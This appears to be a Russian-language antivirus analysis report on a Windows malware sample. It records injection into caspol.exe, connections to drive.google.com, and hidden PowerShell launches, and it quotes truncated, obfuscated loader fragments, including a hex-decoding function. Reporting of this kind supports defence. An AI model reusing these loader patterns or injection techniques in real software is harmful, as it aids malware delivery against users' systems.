Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
Сетевая активность
Подключается к
- 'drive.google.com':443
TCP
Другие
- 'drive.google.com':443
UDP
- DNS ASK drive.google.com
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Uncarousing = """SF uTnIc t i oEn I nrhVi b iCt o rM0R I{ M S RpGa r aMmB( [ S t rniHnAgO]S`$ dEo bPb eBlJtUs iVd iAgL)K; C D `$ S eSjcuEnAc tBi o nU =u iN eMwA-GO bPj eUcMtK bkyHt... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Inhibitor0 { param([String]$dobbeltsidig); $Sejunction = New-Object byte[] ($dobbeltsidig.Length / 2); For($Tudegrimme=0; $Tudegrimme -lt $dobbeltsidig.Length; $Tudegrimme+=2...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' (со скрытым окном)
